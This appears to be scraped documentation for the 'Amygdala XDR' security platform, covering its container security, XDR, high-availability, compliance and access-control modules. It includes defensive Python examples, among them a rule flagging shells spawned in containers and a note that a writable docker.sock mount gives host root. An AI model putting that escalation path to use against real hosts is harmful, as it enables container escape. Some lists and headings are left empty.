Amygdala XDR integrates with popular vulnerability scanners such as OpenVAS and Nessus to scan for vulnerabilities on hosts and networks.

Network protocols

Amygdala XDR uses various network protocols, such as TCP, UDP, and ICMP, to communicate with hosts and devices.

Logging protocols

Amygdala XDR can collect logs from various sources using protocols and mechanisms such as Syslog and the Windows Event Log.

APIs

Amygdala XDR provides APIs that allow integration with other systems and applications, making it easier to correlate vulnerability data with other security information.

These technologies and protocols work together to provide a comprehensive vulnerability detection system that can identify and alert potential vulnerabilities in real-time.

Module Dependency

Amygdala XDR’s Vulnerability Detection module depends on several open-source projects and libraries, including:

A popular open-source vulnerability scanner that is used to detect and report vulnerabilities in target systems.

Dashboards

Container Security

Amygdala XDR’s Container Security module provides visibility and protection for containerized applications and environments. It monitors your containers, images, and registries for vulnerabilities, compliance issues, and anomalous behavior. Container Security uses a combination of host and container-based sensors to collect and analyze data, allowing for early detection and response to potential security incidents. Additionally, it integrates with popular container orchestration platforms such as Kubernetes and Docker Swarm to provide seamless security management.

Features

Continuous Monitoring

It provides continuous monitoring of container images, hosts, and orchestration platforms to detect vulnerabilities and configuration issues.

Security Assessment

It performs automatic security assessments of Docker containers and Kubernetes environments.

Risk Management

It provides a risk score for containers and clusters based on the severity of vulnerabilities, misconfigurations, and other security issues.

Compliance

It can help you achieve compliance with industry security standards by detecting security issues and misconfigurations.

Integration

It integrates with popular container platforms like Docker and Kubernetes, and also with orchestration platforms like Docker Swarm and OpenShift.

Technical Description

Amygdala XDR’s Container Security is designed to provide security monitoring for containerized environments, such as Docker and Kubernetes. The main goal of this module is to detect and respond to threats and anomalies within containerized applications and the infrastructure they run on.

Amygdala XDR’s Container Security module monitors container logs, image vulnerabilities, network traffic, and system calls for potential security threats. It also provides policy-based compliance monitoring to ensure that the containerized environment is configured and running according to best practices and security standards.

The technology used by Amygdala XDR’s Container Security includes integration with Docker and Kubernetes APIs, as well as the use of open-source security tools like Sysdig Falco, which is used for runtime container security. It also includes the use of vulnerability databases like the National Vulnerability Database (NVD) to detect and identify vulnerabilities in container images.

Amygdala XDR’s Container Security is designed to work seamlessly with other Amygdala XDR modules, such as intrusion detection and log analysis, to provide a complete security monitoring solution for containerized environments.
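The two halves of the monitoring described above, policy-based posture checks on container configuration and a Falco-style runtime rule on process events, as an added example and not the product's own checks: the container records are constructed but shaped like the Docker Engine API's container inspect response (Config, HostConfig and Mounts keys), the process events are constructed, and the finding weights used for the risk score are an assumption.

```python
# Constructed container records in the shape of the Docker Engine API inspect response.
CONTAINERS = [
    {"Id": "c1", "Name": "/web", "Config": {"User": "", "Image": "demo/web:1.4"},
     "HostConfig": {"Privileged": False, "PidMode": "", "NetworkMode": "bridge",
                    "CapAdd": None, "ReadonlyRootfs": False},
     "Mounts": [{"Type": "bind", "Source": "/var/run/docker.sock",
                 "Destination": "/var/run/docker.sock", "RW": True}]},
    {"Id": "c2", "Name": "/agent", "Config": {"User": "1000:1000", "Image": "demo/agent:2.0"},
     "HostConfig": {"Privileged": True, "PidMode": "host", "NetworkMode": "host",
                    "CapAdd": ["SYS_ADMIN"], "ReadonlyRootfs": False},
     "Mounts": []},
    {"Id": "c3", "Name": "/db", "Config": {"User": "999", "Image": "demo/db:11"},
     "HostConfig": {"Privileged": False, "PidMode": "", "NetworkMode": "bridge",
                    "CapAdd": None, "ReadonlyRootfs": True},
     "Mounts": [{"Type": "volume", "Source": "dbdata", "Destination": "/var/lib/db", "RW": True}]},
]

# Constructed runtime process events; "host" marks a process outside any container.
EVENTS = [
    {"container_id": "c1", "proc": "nginx", "parent": "containerd-shim", "user": "root"},
    {"container_id": "c1", "proc": "bash", "parent": "nginx", "user": "root"},
    {"container_id": "c3", "proc": "psql", "parent": "postgres", "user": "postgres"},
    {"container_id": "host", "proc": "bash", "parent": "sshd", "user": "ops"},
]

SENSITIVE_HOST_PATHS = {"/var/run/docker.sock", "/etc", "/proc", "/sys", "/root", "/home"}
DANGEROUS_CAPS = {"SYS_ADMIN", "SYS_PTRACE", "NET_ADMIN", "SYS_MODULE"}
SHELLS = {"sh", "bash", "dash", "zsh", "ash"}
WEIGHTS = {"critical": 10, "high": 6, "medium": 3, "low": 1}   # assumption for the risk score


def posture_findings(container):
    """Configuration checks on one container; each finding is (severity, description)."""
    hc, cfg = container["HostConfig"], container["Config"]
    found = []
    if hc.get("Privileged"):
        found.append(("critical", "privileged container"))
    if hc.get("PidMode") == "host":
        found.append(("high", "shares host PID namespace"))
    if hc.get("NetworkMode") == "host":
        found.append(("medium", "shares host network namespace"))
    for cap in hc.get("CapAdd") or []:
        if cap.upper() in DANGEROUS_CAPS:
            found.append(("high", f"adds capability {cap}"))
    if not cfg.get("User"):
        found.append(("medium", "runs as root (no User set)"))
    if not hc.get("ReadonlyRootfs"):
        found.append(("low", "writable root filesystem"))
    for m in container.get("Mounts", []):
        src = m.get("Source", "")
        if m.get("Type") == "bind" and (src == "/" or src.rstrip("/") in SENSITIVE_HOST_PATHS):
            found.append(("critical" if m.get("RW") else "high", f"bind-mounts sensitive host path {src}"))
    return found


def runtime_alerts(events):
    """Falco-style rule: an interactive shell spawned inside a container (host processes ignored)."""
    return [(e["container_id"], f"shell {e['proc']} spawned by {e['parent']}")
            for e in events if e["container_id"] != "host" and e["proc"] in SHELLS]


def assess(containers, events):
    report = {c["Id"]: {"name": c["Name"], "findings": posture_findings(c), "alerts": []}
              for c in containers}
    for cid, msg in runtime_alerts(events):
        if cid in report:
            report[cid]["alerts"].append(msg)
    return report


def risk_score(entry):
    """Posture findings weighted by severity plus a fixed weight per runtime alert."""
    return sum(WEIGHTS[sev] for sev, _ in entry["findings"]) + 6 * len(entry["alerts"])


if __name__ == "__main__":
    for cid, entry in assess(CONTAINERS, EVENTS).items():
        print(f"{entry['name']:<8} score {risk_score(entry):>3}",
              [d for _, d in entry["findings"]], entry["alerts"])
```

The docker.sock bind mount in the first container scores as critical on purpose: a process with write access to the daemon socket can start a privileged container of its own, so it is equivalent to root on the host even though the container itself is unprivileged.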

Technology-Supported, Protocols

Amygdala XDR’s Container Security supports various security and network protocols, such as TLS/SSL, SSH, and IPsec, as well as container technologies like Docker and Kubernetes. It also leverages several security-related tools and technologies, such as Docker Bench, OpenSCAP, and the CIS Kubernetes Benchmark, to provide comprehensive container security monitoring and threat detection capabilities. Additionally, Amygdala XDR’s Container Security integrates with cloud platforms like AWS and Azure to provide centralized monitoring and management of container environments.

Module Dependency

Amygdala XDR’s Container Security module depends on several libraries and projects, including:

Amygdala XDR's Container Security uses Docker API to communicate with the Docker daemon to retrieve information about running containers and their configurations.

Dashboards

XDR

The XDR (Extended Detection and Response) module of the Amygdala XDR platform enables your security teams to detect and respond to threats across multiple endpoints and cloud environments.

The XDR module integrates with other security tools and data sources, such as endpoint detection and response (EDR), cloud security posture management (CSPM), and security information and event management (SIEM) solutions, to provide a comprehensive view of the security posture of an organization. This allows security teams to detect and respond to threats in real-time, minimizing the impact of attacks.

The Amygdala XDR XDR module also includes automation and orchestration capabilities, which enable security teams to automate repetitive tasks and response actions, such as isolating an infected endpoint or blocking a malicious IP address. This helps to improve the efficiency of security operations and reduce the time to detect and respond to threats.

Overall, the Amygdala XDR XDR module is designed to help organizations improve their threat detection and response capabilities, by providing a unified view of their security posture and automating response actions to minimize the impact of attacks.

Features

Cross-platform visibility

Amygdala XDR XDR offers visibility across your multiple endpoints and platforms, including servers, workstations, mobile devices, and cloud environments.

Automated threat detection and response

Amygdala XDR XDR uses advanced analytics and machine learning algorithms to detect and respond to threats automatically, reducing the workload of security teams.

Incident response management

Amygdala XDR XDR provides a centralized platform for incident response management, allowing security teams to investigate incidents quickly and effectively.

Threat hunting

Amygdala XDR XDR enables proactive threat hunting by allowing your security teams to analyze historical data and identify potential threats.

Real-time monitoring and alerting

Amygdala XDR XDR provides real-time monitoring and alerting of potential threats, enabling your security teams to take action before damage occurs.

Compliance management

Amygdala XDR XDR provides compliance management capabilities, helping ensure that your organization complies with industry regulations and standards.

Integration

Amygdala XDR XDR integrates various security solutions and data sources such as Endpoint Detection and Response (EDR), Security Information and Event Management (SIEM), and Network Detection and Response (NDR) to provide a unified view of the organization's security posture.

Technology-Supported, Protocols

The Amygdala XDR XDR module supports a wide range of protocols to enable comprehensive threat detection and response across various endpoints and cloud environments.

Module Dependency

The Amygdala XDR XDR module has some dependencies on other components of the Amygdala XDR platform to function properly. Some of these dependencies include:

The Amygdala XDR XDR module requires an Amygdala XDR Manager instance to receive and analyze data from endpoints and cloud environments. The Amygdala XDR Manager collects and processes data from different sources and then sends it to the XDR module for analysis.

Dashboards

HA Management

HA (High Availability) management is an important aspect of managing an Amygdala XDR cluster. It refers to the ability to ensure that the cluster can continue to operate normally even in the event of hardware or software failures. HA management is critical in ensuring that the cluster remains available and responsive to user requests at all times.

Cluster topology

The topology of the Amygdala XDR cluster is critical to its HA management. A well-designed topology should include multiple nodes distributed across multiple physical hosts, data centers, or availability zones. This ensures that if one node or host fails, the cluster can continue to operate normally.

Load balancing

Load balancing manages the distribution of incoming requests across the nodes in the Amygdala XDR cluster. It can be achieved using various techniques, including DNS round-robin, hardware load balancers, or software-based load balancers.

Monitoring

Monitoring is critical to ensuring that the Amygdala XDR cluster remains healthy and responsive. Various monitoring tools and techniques can be used to monitor the cluster's health, including Amygdala XDR's built-in monitoring modules, third-party monitoring tools, and custom scripts or plugins.

Replication

Amygdala XDR provides several replication mechanisms, including shard replication, index replication, and cross-cluster replication to copy data from one node to another to ensure that data is available even if one node fails.

Backup and recovery

Backup and recovery are important aspects of HA management in the Amygdala XDR. Regular backups of the cluster's data should be taken to ensure that data can be recovered in the event of a failure. Various backup and recovery tools can be used, including Amygdala XDR's built-in backup and restore modules, third-party backup tools, and custom scripts or plugins.
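Whether a topology actually survives a failure is something to check rather than assume. The added example below, which is not the product's own allocator, models how replica placement with zone awareness works in an Elasticsearch or OpenSearch style indexer: copies of one shard never share a node, and with awareness enabled they prefer distinct zones. It then simulates the loss of every single node and of every whole zone and reports whether each shard still has a surviving copy. The three-node, two-zone layout is constructed; in a real cluster the equivalent knobs are index.number_of_replicas and cluster.routing.allocation.awareness.attributes.

```python
from collections import defaultdict

# Constructed topology: three indexer nodes across two zones (an uneven split on purpose).
DEMO_NODES = {"idx-1": "zone-a", "idx-2": "zone-a", "idx-3": "zone-b"}


def allocate(nodes, n_shards, n_replicas, zone_aware=True):
    """Place n_shards primaries plus n_replicas copies each across nodes ({name: zone}).

    Greedy and deterministic: each copy goes to the least-loaded node not already holding
    that shard, preferring (when zone_aware) a zone the shard is not yet in. Returns
    {shard: [node, ...]}; raises if the copies cannot all land on distinct nodes."""
    if n_replicas + 1 > len(nodes):
        raise ValueError("not enough nodes to hold every copy on a distinct node")
    load = {n: 0 for n in nodes}
    placement = {}
    for shard in range(n_shards):
        chosen, zones_used = [], set()
        for _ in range(n_replicas + 1):
            candidates = [n for n in nodes if n not in chosen]
            candidates.sort(key=lambda n: ((nodes[n] in zones_used) if zone_aware else 0, load[n]))
            pick = candidates[0]
            chosen.append(pick)
            zones_used.add(nodes[pick])
            load[pick] += 1
        placement[shard] = chosen
    return placement


def survives(placement, failed_nodes):
    """True if every shard keeps at least one copy outside the failed set."""
    return all(any(n not in failed_nodes for n in copies) for copies in placement.values())


def tolerates_any_single_node(placement, nodes):
    return all(survives(placement, {n}) for n in nodes)


def tolerates_any_single_zone(placement, nodes):
    zones = defaultdict(set)
    for n, z in nodes.items():
        zones[z].add(n)
    return all(survives(placement, members) for members in zones.values())


def assess(nodes, n_shards, n_replicas):
    """Compare the same index with and without zone awareness."""
    out = {}
    for aware in (False, True):
        p = allocate(nodes, n_shards, n_replicas, zone_aware=aware)
        out[aware] = {"placement": p,
                      "node_failure_ok": tolerates_any_single_node(p, nodes),
                      "zone_failure_ok": tolerates_any_single_zone(p, nodes)}
    return out


if __name__ == "__main__":
    for aware, r in assess(DEMO_NODES, 3, 1).items():
        print(f"zone_aware={aware}: survives any node={r['node_failure_ok']} "
              f"any zone={r['zone_failure_ok']} placement={r['placement']}")
```

With one replica both layouts survive any single node, but only the zone-aware one survives losing zone-a, and it does so by stacking three of the six copies on the lone zone-b node. That is the usual trade-off: awareness buys zone tolerance at the cost of balance until the zones themselves are balanced.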

Features

The HA management in Amygdala XDR provides several features that ensure high availability and fault tolerance of the system. Some of these features include:

Scalability
The Amygdala XDR HA architecture is designed to scale horizontally, meaning that new nodes can be added to the cluster to handle increased data traffic. The Load Balancer module ensures that the incoming data traffic is distributed across all the nodes in the cluster, providing a scalable and highly available system.

Redundancy

The Amygdala XDR HA architecture provides redundancy at multiple levels. For example, the Amygdala XDR Manager Cluster module provides redundancy by deploying multiple Amygdala XDR Manager nodes in an active-active configuration. This ensures that if one node fails, the other nodes can continue processing data without any disruption. Similarly, the Elasticsearch Cluster module provides redundancy by distributing data across multiple nodes in the cluster.

Failover

The Amygdala XDR HA architecture provides failover capabilities at multiple levels. For example, if a Amygdala XDR Manager node fails, the Load Balancer module automatically redirects the incoming data traffic to other active nodes in the cluster. Similarly, if an Elasticsearch node fails, the data is automatically redistributed to other nodes in the cluster.

Automatic Configuration

The HA management modules in Amygdala XDR are designed to automatically configure themselves based on the number of nodes in the cluster. For example, the Correlation Rules Manager module ensures that the same set of correlation rules is applied across all the nodes in the cluster, regardless of their number.

Real-time Monitoring

The Amygdala XDR HA management modules provide real-time monitoring of the system's health and status. This ensures that any issues or failures can be quickly identified and resolved, minimizing any potential downtime.

Technology-Supported, Protocols

The HA management module in Amygdala XDR supports a variety of protocols and technologies, including:

TCP/IP

The communication between the different nodes in the Amygdala XDR HA architecture is based on the TCP/IP protocol.

HTTPS

The communication between the Amygdala XDR Manager and Amygdala XDR Agents is encrypted using the HTTPS protocol. The Load Balancer module also supports HTTPS traffic.

Elasticsearch API

The Elasticsearch Cluster module uses the Elasticsearch API to manage and store data.

REST API

The Correlation Rules Manager module provides a REST API for managing correlation rules.

Kibana API

The Kibana module provides a REST API for data visualization and analysis.

Syslog

The Amygdala XDR Manager and Amygdala XDR Agents can send and receive data using the Syslog protocol.

Stack Management

Amygdala XDR Stack Management module allows users to manage various aspects of the Amygdala XDR stack. This tab can be accessed by clicking on the Stack Management icon on the left-hand side of the UI.

Index Management

This module allows users to manage Amygdala XDR indices, including creating, deleting, and updating indices, as well as modifying index settings and mappings.

UI

This module allows users to manage UI settings, including configuring index patterns, creating visualizations and dashboards, managing UI plugins, and more.

Security

This module allows users to manage security settings in the Amygdala XDR stack, including configuring users and roles, managing access control, and configuring SSL/TLS encryption.

Replication

Amygdala XDR provides several replication mechanisms, including shard replication, index replication, and cross-cluster replication. Each copies data from one node to another so that the data remains available even if a node fails.

Amygdala XDR

This module allows users to manage Amygdala XDR settings, including configuring node settings, managing cluster settings, and managing data nodes.

Watcher

This module allows users to manage Amygdala XDR Watcher settings, including configuring watches, managing watch history, and creating and managing actions.

Features

Stack Management in Amygdala XDR provides several features that ensure high availability and fault tolerance of the system. Some of these features include:

Dependency management

Amygdala XDR Stack Management helps manage dependencies in the security platform by ensuring that only authorized and secure dependencies are used.

Version control

Amygdala XDR Stack Management provides version control modules that allow security teams to track changes to code and configuration files.

Environment provisioning

Amygdala XDR Stack Management automates the process of setting up development and testing environments for the security platform, including installing required software and configuring settings.

Continuous integration and deployment

Amygdala XDR Stack Management integrates with continuous integration and deployment (CI/CD) tools to automate the process of building, testing, and deploying the security platform.

Configuration management

Amygdala XDR Stack Management provides configuration management modules that allow security teams to manage configuration files and settings for the security platform.

Compliance management

Amygdala XDR Stack Management provides compliance management modules that help security teams ensure compliance with relevant security standards and regulations.

Regulatory compliance

Payment Card Industry Data Security Standard (PCI DSS)

Amygdala XDR offers FIM and IDS capabilities that help organizations meet the PCI DSS requirements for file integrity monitoring and intrusion detection and prevention.

General Data Protection Regulation (GDPR)

Amygdala XDR's log analysis and FIM capabilities help organizations comply with GDPR requirements for data protection and incident response.

Health Insurance Portability and Accountability Act (HIPAA)

Amygdala XDR's log analysis and IDS capabilities help healthcare organizations comply with HIPAA requirements for security monitoring and incident response.

Federal Risk and Authorization Management Program (FedRAMP)

Amygdala XDR aligns with the NIST Cybersecurity Framework, which is a set of guidelines for managing and reducing cybersecurity risk.

Features

The regulatory compliance module of Amygdala XDR is a key component of the platform, providing features such as:

Compliance monitoring

The regulatory compliance module of Amygdala XDR helps organizations monitor their compliance with various security standards and regulations, such as PCI DSS, HIPAA, GDPR, and ISO 27001.

Customizable policies

The module allows users to create customized compliance policies that are specific to their organization's needs and regulatory requirements.

Automated compliance checks

The compliance module automates compliance checks to ensure that organizations are meeting the requirements of their chosen regulations. This helps to reduce the risk of non-compliance and associated penalties.

Real-time alerts

The compliance module provides real-time alerts for compliance violations, enabling organizations to quickly remediate any issues and maintain compliance.

Centralized management

The module provides a centralized dashboard for managing compliance, making it easy for organizations to view compliance status, policy violations, and remediation actions.

Reporting and audit trails

The compliance module provides detailed reports and audit trails that can be used to demonstrate compliance with regulations to auditors and regulators.

Integration with other Amygdala XDR modules

The compliance module is fully integrated with other Amygdala XDR modules, including intrusion detection, vulnerability assessment, and log analysis, providing a comprehensive security monitoring solution.

Technical Description

The regulatory compliance module of Amygdala XDR is designed to help organizations ensure that they comply with various security standards and regulations, such as PCI DSS, HIPAA, GDPR, and ISO 27001. This module provides a set of predefined rules and checks that are specific to each regulation and allows users to create customized policies that meet their specific needs.

The module’s functionality is based on the concept of auditing, which involves collecting data about the system’s configuration, events, and activities, and comparing them to a set of predefined rules to determine compliance status. The regulatory compliance module collects data from various sources, including system logs, network traffic, and system configuration files, and uses a combination of signature-based and anomaly-based detection techniques to identify potential compliance violations.

The module’s architecture consists of three main components: the data collection agent, the compliance engine, and the reporting and alerting system. The data collection agent is responsible for collecting data from various sources and forwarding it to the compliance engine. The compliance engine processes the collected data and compares it to the predefined rules and policies to determine compliance status. The reporting and alerting system provides real-time alerts and reports on compliance violations.

The compliance module’s predefined rules and policies cover a wide range of security controls, including access control, authentication, encryption, network security, and audit trails. These rules and policies are customizable, allowing organizations to tailor them to their specific needs and requirements.

The module provides real-time alerts and reports on compliance violations, allowing organizations to quickly identify and remediate issues. It also provides detailed reports and audit trails that can be used to demonstrate compliance with regulations to auditors and regulators.

Technology-Supported, Protocols

The regulatory compliance module of Amygdala XDR supports a variety of technologies and protocols for collecting data and performing compliance checks. These include:

Syslog

Amygdala XDR can collect data from systems that send syslog messages, which is a standard protocol for sending log messages across a network.

Windows Event Log

Amygdala XDR can collect data from the Windows Event Log, which is a centralized log service built into the Windows operating system.

File Integrity Monitoring

Amygdala XDR can monitor changes to system files and directories using file integrity monitoring (FIM) techniques, such as checksums and digital signatures.

Network Traffic Analysis

Amygdala XDR can perform compliance checks on network traffic using techniques such as deep packet inspection (DPI) and network intrusion detection (NIDS).

Configuration Auditing

Amygdala XDR can perform compliance checks on system configurations using configuration auditing techniques, such as comparing system configurations to predefined baselines.
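The three-stage flow described in the Technical Description (collection agent, compliance engine, reporting and alerting) and the baseline comparison described under Configuration Auditing, as an added example that is not part of the product or this page. The rule format, the sample configuration text and the baseline values are all constructed for illustration and are not the product's schema or a published control set.

```python
import json

# Constructed sample of collected host configuration (not from any real system).
SOURCES = {
    "sshd_config": "Port 22\nPermitRootLogin yes\nPasswordAuthentication yes\nX11Forwarding no\n",
    "login.defs": "# password aging\nPASS_MAX_DAYS 99999\nPASS_MIN_LEN 6\n",
}
# Hypothetical rule format; baseline values are illustrative, not a published control set.
RULES = [
    {"id": "ssh-001", "source": "sshd_config", "key": "PermitRootLogin", "op": "eq", "expect": "no"},
    {"id": "ssh-002", "source": "sshd_config", "key": "X11Forwarding", "op": "eq", "expect": "no"},
    {"id": "pwd-001", "source": "login.defs", "key": "PASS_MAX_DAYS", "op": "le", "expect": 90},
    {"id": "pwd-002", "source": "login.defs", "key": "PASS_MIN_LEN", "op": "ge", "expect": 7},
]

def collect(raw):
    """Collection step: parse 'Key value' lines, skipping comments and blank lines."""
    settings = {}
    for line in raw.splitlines():
        line = line.strip()
        if line and not line.startswith("#"):
            parts = line.split(None, 1)
            settings[parts[0]] = parts[1].strip() if len(parts) > 1 else ""
    return settings

def evaluate(rule, settings):
    """Compliance engine: compare one collected setting with its baseline rule."""
    actual = settings.get(rule["key"])
    if actual is None:                      # a missing setting is treated as a violation
        passed = False
    elif rule["op"] == "eq":
        passed = actual.lower() == str(rule["expect"]).lower()
    else:                                   # numeric bounds: "le" / "ge"
        try:
            n = int(actual)
        except ValueError:
            n = None
        passed = n is not None and (n <= rule["expect"] if rule["op"] == "le" else n >= rule["expect"])
    return {"rule": rule["id"], "key": rule["key"], "actual": actual, "passed": passed}

def run_checks(sources, rules=RULES):
    """Evaluate every rule against the collected data; one result per rule."""
    collected = {name: collect(raw) for name, raw in sources.items()}
    return [evaluate(r, collected.get(r["source"], {})) for r in rules]

def violations(results):
    """Reporting/alerting step: the failed checks, ready to be emitted as alerts."""
    return [r for r in results if not r["passed"]]

if __name__ == "__main__":
    print(json.dumps(violations(run_checks(SOURCES)), indent=2))
```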

Application Logs

Amygdala XDR can collect data from application logs, including logs generated by web servers, databases, and other applications.

Module Dependency

The regulatory compliance module of Amygdala XDR has some module dependencies that are required for its proper functioning. These dependencies are as follows:

Amygdala XDR Manager

The regulatory compliance module depends on the Amygdala XDR Manager, which is the central component of the Amygdala XDR platform. The Amygdala XDR Manager is responsible for receiving and processing data from data sources, and for forwarding compliance-related data to the compliance module.

Amygdala XDR API

The regulatory compliance module depends on the Amygdala XDR API, which provides a programmatic interface for managing the Amygdala XDR platform. The API is used by the compliance module to retrieve compliance-related data, such as compliance reports and alerts.

Amygdala XDR Agents

The regulatory compliance module depends on the Amygdala XDR agents, which are installed on the systems being monitored. The agents are responsible for collecting data from the monitored systems and forwarding it to the Amygdala XDR Manager for processing.

Dashboards

Amygdala XDR Role-based Access

The Amygdala XDR Role-based Access (RBA) module allows your administrators to define access control policies for users and groups based on their roles or functions within an organization. This module enables organizations to restrict access to sensitive data and functions to only authorized users.

It works by defining roles, which are groups of permissions that determine what actions a user or group can perform within the system. Permissions can be granted or denied for specific resources, such as files, directories, or applications.

The RBA module can be configured through the Amygdala XDR API or the Amygdala XDR management application, which provides a web interface for managing roles and permissions. The module is flexible enough to allow administrators to define complex access control policies and can be integrated with other Amygdala XDR modules, such as the File Integrity Monitoring (FIM) and Vulnerability Detection (VulnDetect) modules.

Features

The Role-based Access (RBA) module in Amygdala XDR offers several features, including:

Role-based access control

The RBA module enables your administrators to define roles and permissions for users and groups based on their roles or functions within an organization. This allows for fine-grained control over who can access specific resources and functions within the system.

Granular permission management

The module allows your administrators to grant or deny permissions for specific resources, such as files, directories, or applications. This helps to ensure that users only have access to the resources they need to perform their job functions.

Flexible configuration

The RBA module can be configured through the Amygdala XDR API or the Amygdala XDR management application, which provides a web interface for managing roles and permissions. This provides administrators with the flexibility to define complex access control policies that meet the needs of their organization.

Integration with other Amygdala XDR modules

The RBA module is integrated with other Amygdala XDR modules, such as the File Integrity Monitoring (FIM) and Vulnerability Detection (VulnDetect) modules. This allows for a comprehensive security solution that can detect and respond to threats across the entire system.

Audit trail

The RBA module provides an audit trail of all access requests and actions taken by users. This helps to ensure accountability and provides a record of who accessed what resources and when.
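The role model described above (roles as groups of permissions, grants or denials per resource, an audit trail of every access request, and role data held as JSON), as an added example that is not the product's own code. The role names, resource names, user-to-role mapping and the deny-overrides-grant evaluation order are assumptions made for this illustration.

```python
import json
from datetime import datetime, timezone

# Constructed role definitions in JSON; the schema is hypothetical, not the product's.
ROLES_JSON = """
{
  "analyst":    {"grant": {"alerts": ["read"], "dashboards": ["read"], "rules": ["read"]},
                 "deny":  {}},
  "rule_admin": {"grant": {"rules": ["read", "write"], "alerts": ["read"]},
                 "deny":  {"rules": ["delete"]}}
}
"""
# Constructed user-to-role assignments.
USERS = {"alice": ["analyst"], "bob": ["analyst", "rule_admin"]}

class RoleBasedAccess:
    def __init__(self, roles, users):
        self.roles, self.users, self.audit = roles, users, []

    def is_allowed(self, user, resource, action):
        """Assumed evaluation order: an explicit deny in any of the user's roles wins,
        otherwise any grant allows; a user with no matching grant is denied by default."""
        granted = denied = False
        for role in self.users.get(user, []):
            r = self.roles.get(role, {})
            if action in r.get("deny", {}).get(resource, []):
                denied = True
            if action in r.get("grant", {}).get(resource, []):
                granted = True
        decision = granted and not denied
        # Audit trail: every access request is recorded with who, what, when and the outcome.
        self.audit.append({"ts": datetime.now(timezone.utc).isoformat(), "user": user,
                           "resource": resource, "action": action, "allowed": decision})
        return decision

def build():
    """Load the JSON role store and user assignments into an access checker."""
    return RoleBasedAccess(json.loads(ROLES_JSON), USERS)

if __name__ == "__main__":
    rba = build()
    for u, res, act in [("alice", "rules", "write"), ("bob", "rules", "write"),
                        ("bob", "rules", "delete"), ("carol", "alerts", "read")]:
        print(u, res, act, rba.is_allowed(u, res, act))
    print(json.dumps(rba.audit, indent=2))
```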

Technology-Supported, Protocols

The Role-based Access (RBA) module in Amygdala XDR uses various technologies and protocols to manage user access control. Some of the technologies and protocols used by the RBA module are:

Lightweight Directory Access Protocol (LDAP)

The RBA module integrates with LDAP servers to manage user authentication and authorization. This allows for centralized management of user accounts and access control policies.

Security Assertion Markup Language (SAML)

The RBA module supports SAML for single sign-on (SSO) authentication. This allows users to log in once and access multiple systems without having to re-enter their credentials.

Transport Layer Security (TLS)

The RBA module uses TLS to encrypt network traffic and ensure secure communication between components.

JavaScript Object Notation (JSON)

The RBA module uses JSON to store role and permission information in configuration files and databases.

Representational State Transfer (REST) API

The RBA module provides a REST API for managing roles and permissions. This allows administrators to automate access control tasks and integrate the RBA module with other systems.

OpenAPI Specification

The RBA module uses the OpenAPI Specification to describe the REST API and provide documentation for developers.

Architecture Diagram